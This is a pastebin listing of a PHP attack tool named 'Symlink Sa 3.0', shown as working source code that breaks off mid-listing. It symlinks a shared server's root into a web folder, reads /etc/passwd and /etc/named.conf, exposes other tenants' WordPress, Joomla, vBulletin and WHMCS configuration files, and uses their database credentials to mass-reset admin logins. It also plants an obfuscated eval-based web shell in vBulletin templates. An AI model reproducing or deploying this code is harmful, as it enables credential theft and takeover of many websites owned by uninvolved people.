Auto Symlink

From BX404, 2 Years ago, written in Plain Text, viewed 1'044 times.
URL http://paste.security-portal.cz/view/716ac89b Shorturl Error: Input provided by user is not valid Embed
Download Paste or View Raw
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  5. $u = explode("/",$pageURL );
  6. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
  7. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  8. $u = explode("/",$pageFTP );
  9. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  10. ?>
  11.  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  12.    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  13.  
  14. <html xmlns="http://www.w3.org/1999/xhtml">
  15. <head>
  16. <title>Symlink_Sa 3.0</title>
  17. <style type="text/css">
  18.  html,body {
  19.     margin: 0;
  20.     padding: 0;
  21.     outline: 0;
  22. }
  23. a{
  24.  
  25. font-size: 13px;
  26.  
  27. }
  28.  
  29.  
  30. body {
  31.    direction: ltr;
  32.    background-color:#F4F4F4;
  33.     color: rgb(153, 153, 153);
  34.    text-align: center
  35. }
  36.  
  37.  
  38.  
  39. input,textarea,select{
  40. font-weight: bold;
  41. color: #000000;
  42. }
  43.  
  44. input,textarea,select:hover{
  45. box-shadow: 0px 0px 4px #AAAAAA;
  46. }
  47.  
  48.  
  49. .hedr {
  50.  font-family: Tahoma, Arial, sans-serif  ;
  51.  font-size: 22px;
  52.  
  53.  
  54. }
  55.  
  56. .cont a{
  57.  
  58. text-decoration: none;
  59. color:rgb(153, 153, 153);
  60. font-family: Tahoma, Arial, sans-serif  ;
  61. font-size: 16px;
  62. text-shadow: 0px 0px 3px ;
  63. }
  64.  
  65. .cont a:hover{
  66.  
  67.  
  68.  color: #EEEEEE ;
  69.  text-shadow:0px 0px 3px #000000 ;
  70.  
  71.  
  72. }
  73.  
  74. .tmp tr td{
  75.  
  76. border: solid 1px #BBBBBB;
  77.  
  78. padding: 2px ;
  79.  font-size: 13px;
  80. }
  81.  
  82. .tmp tr td a {
  83.  text-decoration: none;
  84.  
  85.  
  86.  
  87. }
  88.  
  89. .foter{
  90.  font-size: 9pt;
  91.  color: #AAAAAA ;
  92.  text-align: center
  93. }
  94.  
  95. .tmp tr td:hover{
  96.  
  97. box-shadow: 0px 0px 4px #888888;
  98.  
  99. }
  100. .fot{
  101.  
  102. font-family:Tahoma, Arial, sans-serif;
  103.  
  104.  font-size: 11pt;
  105. }
  106. .for a : hover{
  107.  
  108. text-shadow: 0px 0px 1px #3366FF;
  109.  
  110. }
  111.  
  112.  
  113. .ir {
  114.  color: #FF0000;
  115. }
  116. </style>
  117. </head>
  118. <body>
  119. <div class='all'>
  120. <?php
  121.  
  122. @mkdir('sym',0777);
  123. $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  124. $f =@fopen ('sym/.htaccess','w');
  125. fwrite($f , $htcs);
  126.  
  127.  
  128.  
  129. @symlink("/","sym/root");
  130.  
  131. $pg = basename(__FILE__);
  132.  
  133. echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;
  134.  
  135. echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
  136.  
  137. echo '<div class="cont">
  138.  
  139. [<a href="?"> Home </a>]
  140.  
  141. [<a href="?sws=sym"> User & Domains & Symlink </a>]
  142.  
  143. [<a href="?sws=sec"> Domains & Script </a>]
  144.  
  145. [ <a href="?sws=file"> Symlink File </a>]
  146.  
  147. [<a href="?sws=passwd"> Symlink Bypass </a>]
  148.  
  149. <br /><br />
  150.  
  151. [ <a href="?sws=read"> Bypass Read </a>]
  152.  
  153. [ <a href="?sws=joomla"> Mass Joomla </a>]
  154.  
  155. [ <a href="?sws=wp"> Mass WordPress </a>]
  156.  
  157. [ <a href="?sws=vb"> Mass vBulletin </a>]
  158.  
  159. [ <a href="?sws=help"> Help </a>]
  160.  
  161. <br /><br /><br />
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168. </div>';
  169.  
  170. if(isset($_REQUEST['sws']))
  171. {
  172.  
  173. switch ($_REQUEST['sws'])
  174. {
  175.  
  176.  
  177.  
  178.  
  179.  
  180. /// Domains + Scripts  ///
  181.  
  182. case 'sec':
  183.  
  184. if(!@is_file('named.txt')){
  185.  
  186. $d00m = @file("/etc/named.conf");
  187.  
  188. }else{
  189.  
  190. $d00m = @file("named.txt");
  191.  
  192.  
  193. }
  194. if(!$d00m)
  195. {
  196.  
  197.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  198. }
  199. else
  200.  
  201. {
  202. echo "<div class='tmp'>
  203. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  204. foreach($d00m as $dom){
  205.  
  206. flush();
  207. flush();
  208.  
  209.  
  210.  
  211. if(eregi("zone",$dom)){
  212.  
  213. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
  214.  
  215. flush();
  216.  
  217. if(@strlen(trim($domsws[1][0])) > 2){
  218.  
  219. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  220.  
  221. ///////////////////////////////////////////////////////////////////////////////////
  222.  
  223. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  224. $wpp=@get_headers($wpl);
  225. $wp=$wpp[0];
  226.  
  227. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  228. $wpp2=@get_headers($wp2);
  229. $wp12=$wpp2[0];
  230.  
  231. ///////////////////////////////
  232.  
  233. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  234. $joo=@get_headers($jo1);
  235. $jo=$joo[0];
  236.  
  237.  
  238. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  239. $joo2=@get_headers($jo2);
  240. $jo12=$joo2[0];
  241.  
  242. ////////////////////////////////
  243.  
  244. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  245. $vbb=@get_headers($vb1);
  246. $vb=$vbb[0];
  247.  
  248. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  249. $vbb2=@get_headers($vb2);
  250. $vb12=$vbb2[0];
  251.  
  252. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  253. $vbb3=@get_headers($vb3);
  254. $vb13=$vbb3[0];
  255.  
  256. /////////////////
  257.  
  258. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  259. $whh2= @get_headers($wh1);
  260. $wh=$whh2[0];
  261.  
  262. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  263. $whh2= @get_headers($wh2);
  264. $wh12=$whh2[0];
  265.  
  266. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  267. $whh3= @get_headers($wh3);
  268. $wh13=$whh3[0];
  269.  
  270. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  271. $whh5= @get_headers($wh5);
  272. $wh15=$whh5[0];
  273.  
  274. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  275. $whh4= @get_headers($wh4);
  276. $wh14=$whh4[0];
  277.  
  278.  
  279.  
  280. ////////////////////////////////////////////////////////////////////////////////
  281.  
  282. ////////// Wordpress ////////////
  283.  
  284. $pos = strpos($wp, "200");
  285. $config="&nbsp;";
  286.  
  287. if (strpos($wp, "200") == true )
  288. {
  289. $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  290. }
  291. elseif (strpos($wp12, "200") == true)
  292. {
  293.  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  294. }
  295.  
  296. ///////////WHMCS////////
  297.  
  298. elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
  299. {
  300.  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  301.  
  302. }
  303. elseif (strpos($wh12, "200")  == true)
  304. {
  305.  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  306. }
  307.  
  308. elseif (strpos($wh13, "200")  == true)
  309. {
  310.  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  311.  
  312. }
  313.  
  314. ///////// Joomla to 4 ///////////
  315.  
  316. elseif (strpos($jo, "200")  == true)
  317. {
  318.  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  319. }
  320.  
  321. elseif (strpos($jo12, "200")  == true)
  322. {
  323.  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  324. }
  325.  
  326. //////////vBulletin to 4 ///////////
  327.  
  328. elseif (strpos($vb, "200")  == true)
  329. {
  330.  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  331. }
  332.  
  333. elseif (strpos($vb12, "200")  == true)
  334. {
  335.  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  336. }
  337.  
  338. elseif (strpos($vb13, "200")  == true)
  339. {
  340.  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  341. }
  342.  
  343. else
  344. {
  345. continue;
  346. }
  347. flush();
  348. flush();
  349.  
  350. /////////////////////////////////////////////////////////////////////////////////////
  351.  
  352.  
  353.  
  354. $site = $user['name'] ;
  355.  
  356.  
  357.  
  358. flush();
  359.  
  360. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  361. <td>".$config."</td></tr>"; flush();
  362.  
  363. }
  364. }
  365. }
  366. }
  367.  
  368.  
  369.  
  370.  
  371. break;
  372.  
  373.  
  374. /// user + domine + symlink  ///
  375.  
  376. case 'sym':
  377.  
  378. if(!is_file('named.txt')){
  379.  
  380. $d00m = @file("/etc/named.conf");
  381.  
  382. }else{
  383.  
  384. $d00m = @file("named.txt");
  385.  
  386.  
  387. }
  388. if(!$d00m)
  389. {
  390.  
  391.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  392. }
  393. else
  394.  
  395. {
  396. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  397. foreach($d00m as $dom){
  398.  
  399. if(eregi("zone",$dom)){
  400.  
  401. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  402.  
  403. flush();
  404.  
  405. if(strlen(trim($domsws[1][0])) > 2){
  406.  
  407. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  408.  
  409. flush();
  410.  
  411.  
  412.  
  413. $site = $user['name'] ;
  414.  
  415.  
  416. @symlink("/","sym/root");
  417.  
  418. $site = $domsws[1][0];
  419.  
  420. $ir = 'ir';
  421.  
  422. $il = 'il';
  423.  
  424. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  425. {
  426. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  427. }
  428.  
  429.  
  430. echo "
  431. <tr>
  432.  
  433. <td>
  434. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  435. </td>
  436.  
  437.  
  438. <td>
  439. ".$user['name']."
  440. </td>
  441.  
  442.  
  443.  
  444.  
  445.  
  446.  
  447. <td>
  448. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  449. </td>
  450.  
  451.  
  452. </tr></div> ";
  453.  
  454.  
  455. flush();
  456. flush();
  457.  
  458. }
  459. }
  460. }
  461. }
  462.  
  463.  
  464.  
  465.  
  466. break;
  467.  
  468.  
  469. /// file  symlink ///
  470.  
  471. case 'file':
  472.  
  473. echo'
  474. The file path to symlink
  475.  
  476. <br /><br />
  477. <form method="post">
  478. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  479. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  480. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  481.  
  482.  
  483.  
  484. </form>
  485. ';
  486.  
  487. $pfile = $_POST['file'];
  488. $symfile = $_POST['symfile'];
  489. $symlink = $_POST['symlink'];
  490.  
  491. if ($symlink)
  492. {
  493.  
  494.  
  495. @mkdir('sym1',0777);
  496. $c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
  497. $f =@fopen ('sym1/.htaccess','w');
  498. @fwrite($f , $c);
  499.  
  500. @symlink("$pfile","sym1/$symfile");
  501.  
  502. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
  503.  
  504. }
  505.  
  506.  
  507.  
  508. break;
  509.  
  510. /// bypass read
  511.  
  512. case 'read':
  513.  
  514. echo "read /etc/named.conf";
  515. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  516. flush();
  517. flush();
  518.  
  519.  
  520. $file = '/etc/named.conf';
  521.  
  522.  
  523. $r3ad = @fopen($file, 'r');
  524. if ($r3ad){
  525. $content = @fread($r3ad, @filesize($file));
  526. echo "".htmlentities($content)."";
  527. }
  528. else if (!$r3ad)
  529. {
  530. $r3ad = @show_source($file) ;
  531. }
  532. else if (!$r3ad)
  533. {
  534. $r3ad = @highlight_file($file);
  535. }
  536. else if (!$r3ad)
  537. {
  538. $sm = @symlink($file,'sym.txt');
  539.  
  540.  
  541. if ($sm){
  542. $r3ad = @fopen('sym/sym.txt', 'r');
  543. $content = @fread($r3ad, @filesize($file));
  544. echo "".htmlentities($content)."";
  545.  
  546. }
  547. }
  548.  
  549.  
  550.  
  551. echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
  552.  
  553.  
  554. if(isset($_GET['save'])){
  555.  
  556.  
  557. $cont = stripcslashes($_POST['file']);
  558.  
  559. $f = fopen('named.txt','w');
  560.  
  561. $w = fwrite($f,$cont);
  562.  
  563.                  if($w){
  564.  
  565.                  echo '<br />save has been successfully';
  566.  
  567.                  }
  568.  
  569. fclose($f);
  570.  
  571.  
  572.  
  573.  
  574. }
  575.  
  576.  
  577.  
  578. break;
  579.  
  580. // passwd
  581.  
  582. case 'passwd':
  583.  
  584. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  585.  
  586.  
  587. $cont = stripcslashes($_POST['file']);
  588.  
  589. if(!file_exists('passwd.txt')){
  590.  
  591. $f = @fopen('passwd.txt','w');
  592.  
  593. $w = @fwrite($f,$cont);
  594.  
  595. fclose($f);
  596. }
  597. if($w or @filesize('passwd.txt') > 0){
  598. // * SHOW * //
  599.  
  600. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  601. flush();
  602.  
  603. $fil3 = file('passwd.txt');
  604.  
  605. foreach ($fil3 as $f){
  606.  
  607.     $u=explode(':', $f);
  608.     $user = $u['0'];
  609.  
  610.  
  611.  
  612. echo "
  613. <tr>
  614.  
  615.  
  616.  
  617. <td width='15%'>
  618. $user
  619. </td>
  620.  
  621.  
  622.  
  623.  
  624.  
  625.  
  626. <td width='10%'>
  627. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  628. </td>
  629.  
  630. <td width='10%'>
  631. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  632. </td>
  633.  
  634.  
  635.  
  636. </tr></div> ";
  637.  
  638.  
  639. flush();
  640. flush();
  641.  
  642.  
  643. }
  644.  
  645.  
  646.  
  647.  
  648.  
  649.  
  650. die ("</tr></div>");
  651.  
  652.  
  653.                  }
  654.  
  655.  
  656.  
  657.  
  658.  
  659. }
  660.  
  661.  
  662.  
  663. echo "read /etc/passwd";
  664. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  665. flush();
  666.  
  667. $file = '/etc/passwd';
  668.  
  669.  
  670. $r3ad = @fopen($file, 'r');
  671. if ($r3ad){
  672. $content = @fread($r3ad, @filesize($file));
  673. echo "".htmlentities($content)."";
  674. }
  675. elseif(!$r3ad)
  676. {
  677. $r3ad = @show_source($file) ;
  678. }
  679. elseif(!$r3ad)
  680. {
  681. $r3ad = @highlight_file($file);
  682. }
  683. elseif(!$r3ad)
  684. {
  685.  
  686.                                            for($uid=0;$uid<1000;$uid++){
  687.                                             $ara = posix_getpwuid($uid);
  688.                                               if (!empty($ara)) {
  689.                                                  while (list ($key, $val) = each($ara)){
  690.                                                    print "$val:";
  691.                                                  }
  692.                                                  print "\n";
  693.                                                 }
  694.  
  695.                                        }
  696.  
  697. }
  698.  
  699.  
  700. flush();
  701.  
  702.  
  703. echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  704. flush();
  705.  
  706. break;
  707.  
  708.  
  709.  
  710. case 'joomla':
  711.  
  712. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
  713.  
  714.  
  715. if(isset($_POST['s'])){
  716.  
  717. $file = @file_get_contents('joomla.txt');
  718.  
  719. $ex   = explode("\n",$file);
  720.  
  721. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  722. flush();
  723.  
  724.  
  725. foreach ($ex as $exp){
  726.  
  727. $es   = explode("||",$exp);
  728.  
  729. $config = $es[0];
  730.  
  731. $domin = $es[1];
  732.  
  733. $domins = trim($domin).'';
  734.  
  735. $readconfig  = @file_get_contents(trim($config));
  736.  
  737. if(ereg('JConfig',$readconfig)){
  738.  
  739.  
  740.  
  741. $pass    =  ex($readconfig,'$password = \'',"';");
  742.  
  743. $userdb  =  ex($readconfig,'$user = \'',"';");
  744.  
  745. $db      =  ex($readconfig,'$db = \'',"';");
  746.  
  747. $fix     =  ex($readconfig,'$dbprefix = \'',"';");
  748.  
  749. $tab     =  $fix.'users';
  750.  
  751.  
  752. $con     = @mysql_connect('localhost',$userdb,$pass);
  753.  
  754. $db      = @mysql_select_db($db,$con);
  755.  
  756. $query   = @mysql_query("UPDATE `$tab`  SET `username` ='admin'");
  757.  
  758.  
  759. $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='9cdfb439c7876e703e307864c9167a15'");
  760.  
  761.  
  762. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [admin] pass [lol]</b>';}else{$r = '<b style="color:red">failed</b>';}
  763.  
  764. $domins = trim($domin).'';
  765.  
  766. echo "<tr>
  767. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  768. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  769. flush();
  770.  
  771.  
  772.  
  773. }else{
  774.  
  775. echo "<tr>
  776. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  777. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  778. flush();
  779.  
  780. }
  781.  
  782. }
  783.  
  784.  
  785.  
  786.  
  787.  
  788.  
  789.  
  790.  
  791.  
  792. die();
  793.  
  794. }
  795.  
  796. if(!is_file('named.txt')){
  797.  
  798. $d00m = @file("/etc/named.conf");
  799.  
  800. flush();
  801.  
  802.  
  803. }else{
  804.  
  805. $d00m = file("named.txt");
  806.  
  807.  
  808. }
  809. if(!$d00m)
  810. {
  811.  
  812.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  813. }
  814. else
  815.  
  816. {
  817. echo "<div class='tmp'>
  818. <form method='POST' action='$pg?sws=joomla'>
  819. <input type='submit' value='Mass ching Admin' />
  820. <input type='hidden' value='1' name='s' />
  821. </form><br /><br />
  822. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  823.  
  824. $f = fopen('joomla.txt','w');
  825.  
  826. foreach($d00m as $dom){
  827.  
  828. if(eregi("zone",$dom)){
  829.  
  830. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  831.  
  832. if(strlen(trim($domsws[1][0])) > 2){
  833.  
  834. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  835.  
  836. ///////////////////////////////////////////////////////////////////////////////////
  837.  
  838. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  839. $wpp=get_headers($wpl);
  840. $wp=$wpp[0];
  841.  
  842. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
  843. $wpp2=get_headers($wp2);
  844. $wp12=$wpp2[0];
  845.  
  846. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  847. $wpp3=get_headers($wp3);
  848. $wp13=$wpp3[0];
  849.  
  850.  
  851. ////////// joomla ////////////
  852.  
  853. $pos = strpos($wp, "200");
  854. $config="&nbsp;";
  855.  
  856. if (strpos($wp, "200") == true )
  857. {
  858. $config= $wpl;
  859. }
  860. elseif (strpos($wp12, "200") == true)
  861. {
  862.  $config= $wp2;
  863. }
  864. elseif (strpos($wp13, "200") == true)
  865. {
  866.  $config= $wp3;
  867. }
  868. else
  869. {
  870. continue;
  871.  
  872. }
  873. flush();
  874.  
  875. /////////////////////////////////////////////////////////////////////////////////////
  876.  
  877. $dom = $domsws[1][0];
  878.  
  879. $w = fwrite($f,"$config||$dom \n");
  880. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  881.  
  882.  
  883. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  884. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  885.  
  886.  
  887.  
  888.  
  889.  
  890. flush();
  891.  
  892.  
  893. }
  894. }
  895. }
  896. }
  897.  
  898.  
  899. break;
  900.  
  901. case 'wp':
  902.  
  903. ############################ index #########################3
  904.  
  905.  
  906.  
  907.  
  908.  
  909.  
  910. ########  admin ##########33
  911.  
  912. if(isset($_POST['s'])){
  913.  
  914. $file = @file_get_contents('wp.txt');
  915.  
  916. $ex   = explode("\n",$file);
  917.  
  918. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  919. flush();
  920. flush();
  921.  
  922.  
  923. foreach ($ex as $exp){
  924.  
  925. $es   = explode("||",$exp);
  926.  
  927. $config = $es[0];
  928.  
  929. $domin = $es[1];
  930.  
  931. $domins = trim($domin).'';
  932.  
  933. $readconfig  = @file_get_contents(trim($config));
  934.  
  935. if(ereg('wp-settings.php',$readconfig)){
  936.  
  937.  
  938.  
  939. $pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
  940.  
  941. $userdb  =  ex($readconfig,"define('DB_USER', '","');");
  942.  
  943. $db      =  ex($readconfig,"define('DB_NAME', '","');");
  944.  
  945. $fix     =  ex($readconfig,'$table_prefix  = \'',"';");
  946.  
  947. $tab     = $fix.'users';
  948.  
  949. $con     = @mysql_connect('localhost',$userdb,$pass);
  950.  
  951. $db      = @mysql_select_db($db,$con);
  952.  
  953. $query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
  954.  
  955. $query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  956.  
  957.  
  958.  
  959. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
  960.  
  961. else
  962.  
  963. {
  964.  
  965. $r = '<b style="color:red">failed</b>';
  966.  
  967. }
  968.  
  969. $domins = trim($domin).'';
  970.  
  971. echo "<tr>
  972. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  973. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  974.  
  975. flush();
  976. flush();
  977.  
  978.  
  979.  
  980.  
  981.  
  982.  
  983. }else{
  984.  
  985. echo "<tr>
  986. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  987. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  988.  
  989. flush();
  990. flush();
  991.  
  992. }
  993.  
  994. }
  995.  
  996.  
  997.  
  998.  
  999.  
  1000.  
  1001.  
  1002.  
  1003.  
  1004.  
  1005. die();
  1006.  
  1007. }
  1008.  
  1009. if(!is_file('named.txt')){
  1010.  
  1011. $d00m = @file("/etc/named.conf");
  1012.  
  1013. }else{
  1014.  
  1015. $d00m = @file("named.txt");
  1016.  
  1017.  
  1018. }
  1019. if(!$d00m)
  1020. {
  1021.  
  1022.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1023. }
  1024. else
  1025.  
  1026. {
  1027. echo "<div class='tmp'>
  1028. <form method='POST' action='$pg?sws=wp'>
  1029. <input type='submit' value='Mass Change Admin' />
  1030. <input type='hidden' value='1' name='s' />
  1031. </form>
  1032. <br /><br />
  1033. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1034.  
  1035. flush();
  1036. flush();
  1037.  
  1038. $f = fopen('wp.txt','w');
  1039.  
  1040. foreach($d00m as $dom){
  1041.  
  1042. if(eregi("zone",$dom)){
  1043.  
  1044. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1045.  
  1046. if(strlen(trim($domsws[1][0])) > 2){
  1047.  
  1048. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1049.  
  1050. ///////////////////////////////////////////////////////////////////////////////////
  1051.  
  1052. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  1053. $wpp=get_headers($wpl);
  1054. $wp=$wpp[0];
  1055.  
  1056. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  1057. $wpp2=get_headers($wp2);
  1058. $wp12=$wpp2[0];
  1059.  
  1060. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
  1061. $wpp3=get_headers($wp3);
  1062. $wp13=$wpp3[0];
  1063.  
  1064.  
  1065. ////////// wp ////////////
  1066.  
  1067. $pos = strpos($wp, "200");
  1068. $config="&nbsp;";
  1069.  
  1070. if (strpos($wp, "200") == true )
  1071. {
  1072. $config= $wpl;
  1073. }
  1074. elseif (strpos($wp12, "200") == true)
  1075. {
  1076.  $config= $wp2;
  1077. }
  1078. elseif (strpos($wp13, "200") == true)
  1079. {
  1080.  $config= $wp3;
  1081. }
  1082. else
  1083. {
  1084. continue;
  1085.  
  1086. }
  1087. flush();
  1088.  
  1089. /////////////////////////////////////////////////////////////////////////////////////
  1090.  
  1091. $dom = $domsws[1][0];
  1092.  
  1093. $w = fwrite($f,"$config||$dom \n");
  1094. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1095.  
  1096.  
  1097. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1098. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1099. flush();
  1100. flush();
  1101.  
  1102.  
  1103.  
  1104.  
  1105.  
  1106. flush();
  1107.  
  1108.  
  1109. }
  1110. }
  1111. }
  1112. }
  1113.  
  1114.  
  1115. break;
  1116.  
  1117.  
  1118. case 'vb':
  1119.  
  1120.  
  1121. if(isset($_POST['s'])){
  1122.  
  1123.  
  1124.  
  1125. $file = @file_get_contents('vb.txt');
  1126.  
  1127. $ex   = explode("\n",$file);
  1128.  
  1129. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1130.  
  1131.  
  1132. foreach ($ex as $exp){
  1133.  
  1134. $es   = explode("||",$exp);
  1135.  
  1136. $config = $es[0];
  1137.  
  1138. $domin = $es[1];
  1139.  
  1140. $domins = trim($domin).'';
  1141.  
  1142. $readconfig  = @file_get_contents(trim($config));
  1143.  
  1144. if(ereg('vBulletin',$readconfig)){
  1145.  
  1146.  
  1147.  
  1148. $db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  1149.  
  1150. $userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
  1151.  
  1152. $pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  1153.  
  1154. $con     = @mysql_connect('localhost',$userdb,$pass);
  1155.  
  1156. $db      = @mysql_select_db($db,$con);
  1157.  
  1158. $shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheu​MdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
  1159.  
  1160. $crypt  = "{\${eval(gzinflate(base64_decode(\'";
  1161.  
  1162. $crypt .= "$shell";
  1163.  
  1164. $crypt .= "\')))}}{\${exit()}}</textarea>";
  1165.  
  1166. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  1167.  
  1168. $query  = @mysql_query($sqlfaq,$con);
  1169.  
  1170.  
  1171.  
  1172. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  1173.  
  1174. else
  1175.  
  1176. {
  1177.  
